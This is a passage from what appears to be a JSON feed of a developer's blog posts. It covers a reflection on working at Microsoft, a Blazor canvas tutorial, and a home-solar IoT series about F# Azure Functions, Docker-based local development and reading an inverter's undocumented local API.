content.\nThis is how I look at my job; my job is to produce content. Now, this takes different forms for different people but for me, I do a lot of my content production in the form of blogs. But blogging isn’t the finality of content production, once I’ve written a blog I might extract a talk out of it to submit to some events, turn it into official documentation, propose it to user groups, present it internally or appear on a pod/vod-cast.\nBecause of this, I spent a lot more time writing code than I have for a very long time, the bulk of my days are spent writing code. After all, if I didn’t write code then I’d have nothing to produce content on! 
In fact, I’ve created 30 posts already this year which is the most blogging I’ve done since 2013 (34 posts) but still shy of my busiest year of 2010 (with 80 posts, but I’m not sure if they are date-tagged correctly from the many years of rebuilding my site).\nI really enjoy writing, I’ve been blogging for over a decade now and the fact that it’s my job to do it makes me happy. I don’t do much in the way of conferences, I don’t really subscribe to that style of DevRel. Sure, I do conferences, but spending every other week on an aircraft is exhausting, so I’m more select on the travel I do.\nLearning new things As I’m always looking for new ideas for content and to engage with different audiences I’ve been able to spend a lot of time picking up new technologies. I did my first bit of Golang, learnt WebAssembly and built an IoT project in F# (which I still have more content to come!).\nBeing at Microsoft Microsoft is a facinating organisation to work for as there’s simply nothing else on the same scale to compare it to. Having come from a large Microsoft partner I had some thoughts on what it’d be like to work with Microsoft tools, but in reality, it’s nothing like that (I’ve joked that Readify is more Microsoft than Microsoft).\nAnd being in a completely distributed team is very much a change for me. I’m still quite in the mindset of “I go to the office to work” but in since my office is my home office so I get up of a morning and my main task for the day is done! Quite often I’ll head into the Microsoft Reactor to work rather than working at home, partially because when my kids aren’t in daycare it’s a bit distracting being home with them and partially to get me out of the house.\nBut because we’re distributed we do everything online; we chat through Slack for pretty much everything, we organise video calls at a random time to inconvenience different groups of people each time (there’s no single time that works for everyone!) and ever so occasionally an email is sent. This is a double-edged sword though as I found myself early on checking Slack on Saturday’s (overlap with the US Friday) for example. This isn’t the best, you need to disconnect from work a bit, and over the last few months, I’ve got better at the weekend being non-work time (my laptop rarely gets touched between Friday evening and Monday morning).\nIt’s fun Honestly, I’m having so much fun, probably the most fun I’ve had at work for a while now. I don’t say that intending to throw shade at Readify or anything, but I’d forgotten what it was like to be writing code all the time, building experiments, that sort of stuff.\nHere’s to another 6 months.\nOh, and most importantly… I survived my first reorg! 🤣\n", "id": "2019-07-08-6-months-at-microsoft" }, { "title": "Creating DEV's offline page using Blazor", "url": "https://www.aaron-powell.com/posts/2019-07-08-creating-devto-offline-page-with-blazor/", "date": "Mon, 08 Jul 2019 14:12:11 +1000", "tags": [ "wasm", "dotnet" ], "description": "Let's build something with Blazor!", "content": "This post was originally published under my DEV.to account.\nI came across a fun post from Ali Spittel on Creating DEV’s offline page (their offline page is here).\nGiven that I’ve done some experiments in the past with WebAssembly I decided to have a crack at my own implementation in WebAssembly, in particular with Blazor.\nGetting Started Caveat: Blazor is a platform for building client side web applications using the .NET stack and specifically the C# language. 
It’s highly experimental so there’s a chance things will change from what it exists at the time of writing (I’m using build 3.0.0-preview6.19307.2).\nFirst up you’ll need to follow the setup guide for Blazor and once that’s done create a new project in your favorite editor (I used VS Code).\nI’ve then deleted all the boilerplate code from the Pages and Shared folder (except any _Imports.razor files), Bootstrap from the css folder and sample-data. Now we have a completely empty Blazor project.\nCreating Our Layout First thing we’ll need to do is create the Layout file. Blazor, like ASP.NET MVC, uses a Layout file as the base template for all pages (well, all pages that use that Layout, you can have multiple layouts). So, create a new file in Shared called MainLayout.razor and we’ll define it. Given that we want it to be full screen it’ll be pretty simple:\n@inherits LayoutComponentBase @Body This file inherits the Blazor-provided base class for layouts, LayoutComponentBase which gives us access to the @Body property which allows us to place the page contents within any HTML we want. We don’t need anything around it, so we just put @Body in the page.\nCreating Our Offline Page Time to make the offline page, we’ll start by creating a new file in the Pages folder, let’s call it Offline.html:\n1 2 3 @page "/" <h3>Offline</h3> This is our starting point, first we have the @page directive which tells Blazor that this is a page we can navigate to and the URL it’ll respond to is "/". We’ve got some placeholder HTML in there that we’ll replace next.\nStarting the Canvas The offline page is essentially a large canvas that we can draw on, and we’ll need to create that, let’s update Offline.razor with a canvas element:\n1 2 3 @page "/" <canvas></canvas> Setting the Canvas Size We need to set the size of the canvas to be full screen and right now it’s 0x0, not ideal. Ideally, we want to get the innerWidth and innerHeight of the browser, and to do that we’ll need to use the JavaScript interop from Blazor.\nWe’ll quickly make a new JavaScript file to interop with (call it helper.js and put it in wwwroot, also update index.html in wwwroot to reference it):\n1 2 3 window.getWindowSize = () => { return { height: window.innerHeight, width: window.innerWidth }; }; Next we’ll create a C# struct to represent that data (I added a file called WindowSize.cs into the project root):\n1 2 3 4 5 6 7 8 namespace Blazor.DevToOffline { public struct WindowSize { public long Height { get; set; } public long Width { get; set; } } } Lastly, we need to use that in our Blazor component:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width"></canvas> @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } } That’s a bit of code added so let’s break it down.\n@inject IJSRuntime JsRuntime Here we use Dependency Injection to inject the IJSRuntime as a property called JsRuntime on our component.\n<canvas height="@windowSize.Height" width="@windowSize.Width"></canvas> Next, we’ll set the height and width properties of the <canvas> element to the value of fields off an instance of our struct, an instance named windowSize. 
Note the @ prefix, this tells the compiler that this is referring to a C# variable, not a static string.\n1 2 3 4 5 6 7 8 @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } } Now we’ve added a code block into our component. It contains the variable windowSize (which is uninitialized, but it’s a struct so it has a default value) and then we override a Lifecycle method, OnInitAsync, in which we call out to JavaScript to get the window size and assign it to our local variable.\nCongratulations, you now have a full screen canvas! 🎉\nWiring Up Events We may have our canvas appearing but it doesn’t do anything yet, so let’s get cracking on that by adding some event handlers:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width" @onmousedown="@StartPaint" @onmousemove="@Paint" @onmouseup="@StopPaint" @onmouseout="@StopPaint" /> @code { WindowSize windowSize; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); } private void StartPaint(UIMouseEventArgs e) { } private async Task Paint(UIMouseEventArgs e) { } private void StopPaint(UIMouseEventArgs e) { } } When you’re binding events in Blazor you need to prefix the event name with @, like @onmousedown, and then provide it the name of the function to invoke when the event happens, e.g. @StartPaint. The signature of these functions are to either return a void or Task, depending on whether it’s asynchronous or not. The argument to the function will need to be the appropriate type of event arguments, mapping to the DOM equivalent (UIMouseEventArgs, UIKeyboardEventArgs, etc.).\nNote: If you’re comparing this to the JavaScript reference implementation, you’ll notice I’m not using the touch events. This is because, in my experiments today, there is a bug with binding touch events in Blazor. Remember, this is preview!\nGetting the Canvas Context Note: I’m going to talk about how to setup interactions with <canvas> from Blazor, but in a real application you’d more likely want to use BlazorExtensions/Canvas than roll-you-own.\nSince we’ll need to work with the 2D context of the canvas we’re going to need access to that. 
But here’s the thing, that’s a JavaScript API and we’re in C#/WebAssembly, this will be a bit interesting.\nUltimately, we’re going to have to this in JavaScript and rely on the JavaScript interop feature of Blazor, so there’s no escaping writing some JavaScript still!\nLet’s write a little JavaScript module to give us an API to work with:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 (window => { let canvasContextCache = {}; let getContext = canvas => { if (!canvasContextCache[canvas]) { canvasContextCache[canvas] = canvas.getContext("2d"); } return canvasContextCache[canvas]; }; window.__blazorCanvasInterop = { drawLine: (canvas, sX, sY, eX, eY) => { let context = getContext(canvas); context.lineJoin = "round"; context.lineWidth = 5; context.beginPath(); context.moveTo(eX, eY); context.lineTo(sX, sY); context.closePath(); context.stroke(); }, setContextPropertyValue: (canvas, propertyName, propertyValue) => { let context = getContext(canvas); context[propertyName] = propertyValue; } }; })(window); I’ve done this with a closure scope created in an anonymous-self-executing-function so that the canvasContextCache, which I use to avoid constantly getting the context, isn’t exposed.\nThe module provides us two functions, the first is to draw a line on the canvas between two points (we’ll need that for the doodling!) and the second updates a property of the context (we’ll need that to change colours!).\nYou might also notice that I don’t ever call document.getElementById, I just somehow “magically” get the canvas. This can be achieves by capturing a component reference in C# and passing that reference around.\nBut this is still all JavaScript, what do we do in C#? Well, we create a C# wrapper class!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public class Canvas2DContext { private readonly IJSRuntime jsRuntime; private readonly ElementRef canvasRef; public Canvas2DContext(IJSRuntime jsRuntime, ElementRef canvasRef) { this.jsRuntime = jsRuntime; this.canvasRef = canvasRef; } public async Task DrawLine(long startX, long startY, long endX, long endY) { await jsRuntime.InvokeAsync<object>("__blazorCanvasInterop.drawLine", canvasRef, startX, startY, endX, endY); } public async Task SetStrokeStyleAsync(string strokeStyle) { await jsRuntime.InvokeAsync<object>("__blazorCanvasInterop.setContextPropertyValue", canvasRef, "strokeStyle", strokeStyle); } } This is a generic class that takes the captured reference and the JavaScript interop API and just gives us a nicer programmatic interface.\nWiring Up Our Context We can now wire up our context and prepare to draw lines on the canvas:\n@page "/" @inject IJSRuntime JsRuntime <canvas height="@windowSize.Height" width="@windowSize.Width" @onmousedown="@StartPaint" @onmousemove="@Paint" @onmouseup="@StopPaint" @onmouseout="@StopPaint" @ref="@canvas" /> @code { ElementRef canvas; WindowSize windowSize; Canvas2DContext ctx; protected override async Task OnInitAsync() { windowSize = await JsRuntime.InvokeAsync<WindowSize>("getWindowSize"); ctx = new Canvas2DContext(JsRuntime, canvas); } private void StartPaint(UIMouseEventArgs e) { } private async Task Paint(UIMouseEventArgs e) { } private void StopPaint(UIMouseEventArgs e) { } } By adding @ref="@canvas" to our <canvas> element we create the reference we need and then in the OnInitAsync function we create the Canvas2DContext that we’ll use.\nDrawing On The Canvas We’re finally ready to do some drawing on our canvas, which means we need to implement those event 
handlers:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 bool isPainting = false; long x; long y; private void StartPaint(UIMouseEventArgs e) { x = e.ClientX; y = e.ClientY; isPainting = true; } private async Task Paint(UIMouseEventArgs e) { if (isPainting) { var eX = e.ClientX; var eY = e.ClientY; await ctx.DrawLine(x, y, eX, eY); x = eX; y = eY; } } private void StopPaint(UIMouseEventArgs e) { isPainting = false; } Admittedly, these aren’t that different to the JavaScript implementation, all they have to do is grab the coordinates from the mouse event and then pass them through to the canvas context wrapper, which in turn calls the appropriate JavaScript function.\nConclusion 🎉 We’re done! You can see it running here and the code is on GitHub (the GitHub repo contains the info to use VS Code remote containers so you don’t have to install anything).\nThis is a pretty quick look at Blazor, but more importantly, how we can use Blazor in a scenario that might require us to do a bit more interop with JavaScript that many scenarios require.\nI hope you’ve enjoyed it and are ready to tackle your own Blazor experiments as well!\nBonus, The Colour Picker There’s one thing that we didn’t do in the above example, implement the colour picker!\nI want to do this as a generic component so we could do this:\n<ColourPicker OnClick="@SetStrokeColour" Colours="@colours" /> In a new file, called ColourPicker.razor (the file name is important as this is the name of the component) we’ll create our component:\n<div class="colours"> @foreach (var colour in Colours) { <button class="colour" @onclick="@OnClick(colour)" @key="@colour"></button> } </div> @code { [Parameter] public Func<string, Action<UIMouseEventArgs>> OnClick { get; set; } [Parameter] public IEnumerable<string> Colours { get; set; } } Our component is going to have 2 parameters that can be set from the parent, the collection of colours and the function to call when you click on the button. For the event handler I’ve made is so that you pass in a function that returns an action, so it’s a single function that is “bound” to the name of the colour when the <button> element is created.\nThis means we have a usage like this:\n@page "/" @inject IJSRuntime JsRuntime <ColourPicker OnClick="@SetStrokeColour" Colours="@colours" /> // snip @code { IEnumerable<string> colours = new[] { "#F4908E", "#F2F097", "#88B0DC", "#F7B5D1", "#53C4AF", "#FDE38C" }; // snip private Action<UIMouseEventArgs> SetStrokeColour(string colour) { return async _ => { await ctx.SetStrokeStyleAsync(colour); }; } } Now if you click the colour picker across the top you get a different colour pen.\nHappy doodling!\n", "id": "2019-07-08-creating-devto-offline-page-with-blazor" }, { "title": "Home Grown IoT - Processing Data", "url": "https://www.aaron-powell.com/posts/2019-07-01-home-grown-iot-processing-data/", "date": "Mon, 01 Jul 2019 11:20:18 +1000", "tags": [ "fsharp", "iot", "azure-functions", "serverless" ], "description": "How I go about processing data streams from IoT devices", "content": "Last Time we looked at how to get data from an IoT device and start pushing it up to Azure, now it’s time for the next step, processing the data as it comes in.\nI mentioned in the solution design that the processing of the data would happen with Azure Functions so let’s have a look at how that works.\nProcessing Data with Functions Azure Functions has built in support for processing data out of IoT Hub which makes it really easy to integrate. 
The only drawback of this is that it monitors the built-in event hub that’s provided by IoT Hub and if you have multiple data structures being submitted (like I do) your Function will become complex. Instead I’m going to use the Event Hub binding.\nDesigning Functions When designing functions, or serverless in general, you want to keep them as small as possible; our goal isn’t to create a serverless monolith! This means that part of the design requires you to think about what the role your functions will be playing. For me, they will be responsible for converting the JSON payloads that are sent from the IoT device into a structure that is stored in Table Storage. If we think about the APIs I described in the data downloader post there is one endpoint, livedata, that provides me with the bulk of the data needed for capture.\nAfter a bit of inspection of the real API I noticed that there were 3 buckets that this data could be represented in:\nPanel data Point-in-time summary data Miscellaneous data I made the decision to store each of these as separate tables in Table Storage (to understand more, check out the post on data design). Since they all come from the same originating structure I could do it all in a single function, but instead I split it into 3 functions, keeping each as lightweight as possible.\nWriting Our Function The Functions are implemented in F# (here’s how to set that up) and I’m using the FSharp.Azure.Storage NuGet package to make working with the Table Storage SDK more F# friendly.\nNote: If you’re going to use that NuGet package in F# Azure Functions you’ll need to be really careful on the versions that you’re depending on. Since Functions internally uses Table Storage there’s a potential to bring in conflicting versions that results in errors. I solved this with very explicit pinning in my paket.dependencies file.\nWe’ll start by defining the Record Type that will be stored in Table Storage:\n1 2 3 4 5 6 7 8 9 10 type PanelInfo = { [<PartitionKey>] DateStamp: string [<RowKey>] Id: string Panel: string MessageId: string Current: float // Iin# Volts: float // Vin# Watts: float // Pin# MessageTimestamp: DateTime // SysTime CorrelationId: string } On the Record Type I’ve added attributes to represent which members will be the Partition and Row keys in Table Storage, which makes it nicer for me to work against the object model if I require. This type is used to represent the data for a single group of panels in my solar setup and gives me a view of the inbound values across Volts, Watts and Current.\nTo define the Function itself we create a member in the module:\n1 2 3 4 5 6 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = ignore() // todo We attribute the member (which I’ve called trigger) with FunctionName so the Functions host knows to find it and knows what name to give it. Unfortunately, you’ll need to explicitly state the type, F# won’t be able to infur the type based on usage of the complex types in the binding (at least, not in my experience).\nThis Function has 3 inputs to it, the first is the Event Hub binding, which binds to an Event Hub named live-data using the Consumer Group Panel (see the Solution Design section Handling a Message Multiple Times for why I use Consumer Groups). 
We’ll also use the EventData type for the input, not a string, so we can access the metadata of the message, not just the body (which is what comes in when the type is string). Next up is the output binding to Table Storage, bound as a CloudTable, which provides me with interop with FSharp.Storage.Data. Lastly is the ILogger so I can log out messages from the Function.\nUnpacking the Message It’s time to start working with the message, and for that I need to extract the body (and strongly type it with a Type Provider) and get some metadata:\n1 2 3 4 5 6 7 8 9 10 11 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message The EventData object gives us access to the body of the message as an ArraySegment but we want the whole array, which is exposed by the Array property. This is a UTF8 encoded byte array so we have to decode that to the string of JSON (or whatever your transport structure was). Then, because we have access to the whole message, not just the body, we can access the additional properties that are put into the message by the downloader, the CorrelationId and MessageId.\nBecause the data points comes up as an array of key/value pairs I created a function to find a specific point’s value:\n1 2 3 let findPoint (points: LiveDataDevice.Point[]) name = let point = points |> Array.find(fun p -> p.Name = name) float point.Value And then use partial application to bind the parsed data to it:\n1 2 3 4 5 6 7 8 9 10 11 12 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points Writing to Storage Because I need to write 2 panel groups to storage I created a function in the Function to do that:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points let deviceId = parsedData.DeviceId.ToString() let timestamp = epoch.AddSeconds(findPoint' "SysTime") let storePanel p = let panel = { DateStamp = timestamp.ToString("yyyy-MM-dd") Panel = p Id = Guid.NewGuid().ToString() MessageId = messageId Current = findPoint' (sprintf "Iin%s" p) Volts = findPoint' 
(sprintf "Vin%s" p) Watts = findPoint' (sprintf "Pin%s" p) MessageTimestamp = timestamp CorrelationId = correlationId } panel |> Insert |> inTableToClientAsync panelDataTable This created the record type using the panel number passed in (let! _ = storePanel "1" is how it’s called) before handing it over to the Insert function from my external library. But FSharp.Azure.Storage library is designed to work with the client from the SDK, and convert that into a CloudTable, it’s not 100% optimised for using in Azure Functions, this is an easy fix though, here’s a function to handle that:\n1 let inTableToClientAsync (table: CloudTable) o = inTableAsync table.ServiceClient table.Name o Finally, because we’re using F#’s async workflows and the Azure Function host only handles Task<T> (C#’s async) we need to convert it back with Async.StartAsTask:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [<FunctionName("PanelTrigger")>] let trigger ([<EventHubTrigger("live-data", ConsumerGroup = "Panel", Connection = "IoTHubConnectionString")>] eventData: EventData) ([<Table("PanelData", Connection = "DataStorageConnectionString")>] panelDataTable: CloudTable) (logger: ILogger) = async { let message = Encoding.UTF8.GetString eventData.Body.Array let correlationId = eventData.Properties.["correlationId"].ToString() let messageId = eventData.Properties.["messageId"].ToString() let parsedData = LiveDataDevice.Parse message let findPoint' = findPoint parsedData.Points let deviceId = parsedData.DeviceId.ToString() let timestamp = epoch.AddSeconds(findPoint' "SysTime") let storePanel p = let panel = { DateStamp = timestamp.ToString("yyyy-MM-dd") Panel = p Id = Guid.NewGuid().ToString() MessageId = messageId Current = findPoint' (sprintf "Iin%s" p) Volts = findPoint' (sprintf "Vin%s" p) Watts = findPoint' (sprintf "Pin%s" p) MessageTimestamp = timestamp CorrelationId = correlationId } panel |> Insert |> inTableToClientAsync panelDataTable let! _ = storePanel "1" let! _ = storePanel "2" logger.LogInformation(sprintf "%s: Stored panel %s for device %s" correlationId messageId deviceId) } |> Async.StartAsTask And with that, for each message we received 2 entries are written to Table Storage.\nConclusion I won’t go over each of the functions in the project as they all follow this same pattern, instead, you can find them on GitHub.\nWhile it might feel a little like a micromanagement of the codebase by having a whole bunch of functions with less than 50 lines in them, it makes them a lot simpler to maintain and editable as you iterate the development. It also makes it scale very nicely, which I’ve found a few times when I’ve accidentally disabled the functions for 24 hours and had a huge backlog in Event Hub to process, it makes quick job of it!\nI hope this gives you a bit of an insight into how you can create your own Azure Functions stack for processing data, whether it’s from an IoT device, or some other input stream.\n", "id": "2019-07-01-home-grown-iot-processing-data" }, { "title": "A VS Code Extension for Managing Profiles", "url": "https://www.aaron-powell.com/posts/2019-06-28-vscode-extension-for-managing-profiles/", "date": "Fri, 28 Jun 2019 11:29:54 +1000", "tags": [ "vscode" ], "description": "I've created a little VS Code extension for swapping between different profile setups", "content": "Part of my job as a Cloud Developer Advocate is to present, whether that is at a lunch and learn session, a user group, a conference or a screen cast. 
One thing that’s become second nature to me with presenting is tweaking my editor font size, theme, etc. so that it is optimal for the audience. But this becomes a bit tedious, because I then have to go back and undo all my changes again, and the constant change back and forth is annoying.\nSo with that I decided to create an extension for VS Code called Profile Switcher.\nHow It Works When you save a profile with the extension it will create a copy of the settings.json file that exists for your user (on Windows this is %APPDATA%\\Roaming\\Code\\User\\settings.json) and then store it under a settings property in that same settings.json file that the extension knows about.\nSide note: It doesn’t clone the extension’s own settings, just everything else, wouldn’t want you to have recursive settings saved! 🤣\nThen when you load a profile it will merge your current settings.json with the previously saved one, updating the properties that are different (and not touching the ones that didn’t change). Because it updates your user settings.json all open VS Code instances will have the changes applied, handy if you’re running demos across multiple VS Code instances!\nA nifty side-effect of how this works is that if you’re using the Settings Sync extension your profiles will be synchronised with that, so when you jump between machines you can bring your profiles along with you!\nThis also means that it’s not just for presenting, it’s for any scenario where you might want to quickly jump between settings changes in VS Code.\nConclusion I hope you find this extension useful and I’d love to get some feedback on what it could also be used for. I’ve made the code available on GitHub so you can create an issue for me or propose an update. 😁\n", "id": "2019-06-28-vscode-extension-for-managing-profiles" }, { "title": "Home Grown IoT - Local Dev", "url": "https://www.aaron-powell.com/posts/2019-06-19-home-grown-iot-local-dev/", "date": "Wed, 19 Jun 2019 09:24:38 +1000", "tags": [ "fsharp", "iot" ], "description": "A look at how you can do local development with IoT solutions", "content": "Now that we’re starting to build our IoT application it’s time to start talking about the local development experience for the application. At the end of the day I use IoT Edge to do the deployment onto the device and manage the communication with IoT Hub, and there is a very comprehensive development guide for Visual Studio Code and Visual Studio 2019. The workflow of this is to create a new IoT Edge project, set up IoT Edge on your machine and do deployments to it that way.
This is the way I’d recommend going about it yourself as it gives you the best replication of production and local development.\nBut as you might have guessed I didn’t follow that guide myself, mainly because I didn’t integrate with IoT Edge (or IoT Hub for that matter) until after I’d started building my solution, instead I retrofitted them back into a standard .NET Core project, and this is what I’ll talk about today.\nDefining Our Moving Parts Another reason that I didn’t go back and completely integrate IoT Edge into my project for local development is because I have a single git repo that contains three main pieces, the Downloader that runs on the Raspberry Pi, some Azure Functions that run in Azure and a webserver that I use as a mock of my inverter API that is only used to support local development.\nThis has meant that my git repo looks like this:\n/src /Sunshine.Downloader /Sunshine.Functions /Sunshine.MockAPI And the standard guidance kind of assumes that you’re doing 1 project per repo, so the only thing that is there is IoT “stuff”, which isn’t my case.\nWith all of this in mind it was easier to have a local development setup that works for my scenario than shoehorn in the recommended guidance.\nDocker All The Things I’m a huge fan of using Docker for local development and given that IoT Edge deployments use Docker images to run on the device it was a convenient decision that I made early on to do my development this way! But here’s the kicker, I have 3 different containers that I’ll need to run (yes I could put it all into a single container, no you shouldn’t do that) so how do we effectively do that in Visual Studio Code? A launch.json file tends to be focused on debugging, so we’ll have to stick to just using tasks.\nBuilding Images This is the first thing that we’ll need to do, build the three different images that are needed for local development. But here’s the interesting problem, it’s a single .NET Core solution that shares some code files across the projects (mostly type definitions so I can do type-certainty across the wire) meaning I really only want to do a compile once. That is a bit of a pain with Docker, I’d normally use multi-stage builds and do the compile step in there, spitting out the image with the compiled files, but that won’t work easily when I spit out three images!\nTo combat this I do the compilation (and publish) step on my host machine first and then pull the build artifacts into the images. This comes with a slight overhead as I have to run a few tasks manually in VS Code.\nOrchestrating With Tasks I have three main tasks that I use in VS Code for running locally: the first does the publish (publish:debug) of the .NET solution so I get the artifacts to be used in the Docker images, the second builds the three images (docker build) and the third starts all three containers (docker run). You’ll find the tasks.json in the GitHub repository.\nAll of these tasks are Compound Tasks, meaning they are tasks that run other tasks. One thing to remember about compound tasks is that the tasks you list in the dependsOn property are executed in parallel, so if you want a task that runs an image it has to depend on a task that builds the image, which in turn depends on the .NET publish (there’s a rough sketch of this chain just below).
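To make that task chain a little more concrete, here's a rough sketch of what this kind of setup can look like in a tasks.json. It's illustrative only, with made-up labels and commands covering just one of the three projects; the real file, wiring up all three containers, lives in the GitHub repository.

```jsonc
{
  "version": "2.0.0",
  "tasks": [
    {
      // publish the whole solution once so the images can copy the artifacts in
      "label": "publish:debug",
      "type": "shell",
      "command": "dotnet publish --configuration Debug"
    },
    {
      // build one of the three images from the published output
      "label": "build:downloader-image",
      "type": "shell",
      "command": "docker build -t sunshine-downloader -f src/Sunshine.Downloader/Dockerfile .",
      "dependsOn": ["publish:debug"]
    },
    {
      // run the container; depending on the build task means VS Code builds before running
      "label": "run:downloader",
      "type": "shell",
      "command": "docker run --rm sunshine-downloader",
      "dependsOn": ["build:downloader-image"]
    }
  ]
}
```

Because the entries in dependsOn are run in parallel rather than in sequence, chaining things this way only gets you so far, which is where the manual steps mentioned next come in.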
This was a slight annoyance for me since I have 3 tasks (image creation) that depend on 1 task completion (.NET publish), so I have to run them manually.\nDebugging I’ve previously written about debugging .NET Core in Docker from VS Code and a challenge I had debugging the Azure Functions base image and this is the process I use for local development, start the containers with tasks, use launch.json to attach to containers as required. The biggest pain is that you can’t connect the debugger to multiple containers at one time, but this is just a limitation in the debugger in VS Code (and not a major pain).\nConclusion The approach I’m taking for local development isn’t really tied to this project being an IoT project, instead, it’s more running a few small .NET applications, all using Docker containers. Using Docker means that I can easily control the environment I’m using for development but also replicates how the IoT part of the project will run in production.\nIf I was building a project to run on more devices than just my own (and for use in a team environment) I’d use the approach described on the Microsoft docs for Visual Studio Code and Visual Studio 2019 as it’s a lot more robust. But this works just fine for my needs. 😉\n", "id": "2019-06-19-home-grown-iot-local-dev" }, { "title": "Home Grown IoT - Data Downloader", "url": "https://www.aaron-powell.com/posts/2019-06-12-home-grown-iot-data-downloader/", "date": "Wed, 12 Jun 2019 09:47:13 +1000", "tags": [ "fsharp", "iot" ], "description": "Let's start diving into the codebase, starting with capturing data", "content": "We talked last time about how to structure data for IoT projects and some of the decisions that led me to the structure that I have ultimately taken with the project, so this makes it seem like a good time to start looking at the code, in particular, the code I use to capture the data from the inverter itself.\nI’ll be focusing on the code for the Downloader, which lives in this part of the GitHub repo and also touch on a bit on the general development approaches I went with for the project.\nCodebase Basics Let’s start with some of the basics of how the codebase works. As I mentioned in the prologue I chose to do this as an F# .NET Core application so that I could easily deploy it to both Linux and Windows. I’m also using Docker for the development and deployment (I’ll cover local development in a future post though) to make it easier for me to control the dependencies and environment.\nI also opted to use Paket, which is an alternative package manager to NuGet that is very common in the F# community but also introduces the concept of a lockfile to better handle transitive dependencies or conflicting dependency versions. I will admit that I’m not sold on Paket, I did have a number of times where I was having to actively fight it and it also isn’t a .NET Core tool, meaning you need mono if you want to use Linux/WSL or rely on the in-development-and-unsupported-version (which is actually what I do). But in the end I got it all working, so I am careful not to touch it, lest I break things! 😝\nThe codebase is broken up into 3 projects, Downloader (which we’ll cover today), Functions and Mock API (for local development). These all live in the src folder alongside some shared files (in Shared). The root of the git repo contains the usual git files, my azure-pipelines.yml for the build pipeline (I’ll talk Pipelines in the future), the Paket files and a .sln. 
Admittedly, I do most of the development in VS Code, but sometimes I fire up full Visual Studio, especially when trying to visualise the dependency tree.\nThe Downloader It’s time to start looking at the Downloader and in doing so learn a bit about how the ABB inverter exposes its API. But there’s one thing I want to make clear from the outset:\nI am working against an undocumented API on the inverter, and using it in a way it was not intended to be used. Accessing your inverter in this manner shouldn't break anything but it just might. I take no responsibility for any damage you might somehow do! Do this at your own risk!\nWith the disclaimer done let’s look at how we’ll get the data. The first job for me was to work out how to actually get the data, after all, this isn’t a documented API, so I needed to work out just what endpoints existed and what I needed to access.\nThe approach I took for this was to sit with the network tools in my browser open while I was on the dashboard for the inverter and just watched the XHR network events. Given I’d already determined it to be an AngularJS application it was really just a matter of watching the network traffic to find the things that were most useful. Through doing that I found 4 interesting API endpoints (there were others but either I can’t work out what they are for, or they are just keep-alive tests):\n/v1/specs This API describes the devices that are available and returns a JSON payload (example) that gives me the information about the device (the inverter) and the logger (the thing that sends data to ABB’s cloud platform) Ultimately, this API is a metadata endpoint which I don’t need to call, but I do because it means I don’t have to hard-code anything about my device in the solution The dashboard seems to invoke this when the AngularJS application first starts up, and never again (I guess the values are in the JavaScript memory) /v1/livedata/list This is one of two API’s under livedata and it is another metadata endpoint, this time it gives me the information about what sensors are being monitored by the inverter that I can get data from. It also provides information about them like their unit of measure, description (which, generally speaking, isn’t actually descriptive!) and decimal precision. Again I have an example on GitHub The dashboard seems to invoke this approximately every 5 minutes. I don’t know why it would refresh this, hopefully the sensors don’t change that often! /v1/livedata This is the juicy bit, here’s where the data is useful, this returns the values for the sensors described by livedata/list (example) The dashboard calls this a lot, approximately every 30 seconds, which stands to reason as it is the primary data feed /v1/feeds This API confuses me as it is always called with a bunch of query string values that returns the Pgrid in 5 minute blocks. By looking at the data it appears that Pgrid is to do with the power (watts) to the grid from the inverter (and that stands to reason from the name) but I wasn’t able to work out anything else I could adjust on the query string if I wanted to get other metrics. I think I do get this information in livedata too, but it can’t hurt to have it captured twice, and after all, they made a dedicated API for this for a reason. 
